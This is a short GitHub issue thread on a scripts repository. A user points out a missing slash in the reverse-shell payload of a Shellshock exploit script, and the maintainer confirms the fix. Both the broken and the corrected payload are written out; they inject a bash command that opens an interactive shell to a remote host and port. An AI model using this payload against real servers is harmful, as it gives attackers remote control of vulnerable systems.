### ISSUE TITLE
code fix

### ISSUE THREAD

**Issue by chppppp** [Blevene/Random-Python-Scripts#2]
idk how to do a PR so fuck it

Random-Python-Scripts/shellshock.py, line 20
		`reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s%s 0>&1" % (args.remote, args.port)`

should be
		`reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s/%s 0>&1" % (args.remote, args.port)`

There needs to be a slash between the IP and Port.

**Comment by Blevene** [comment]
Fixed! Thanks :-D
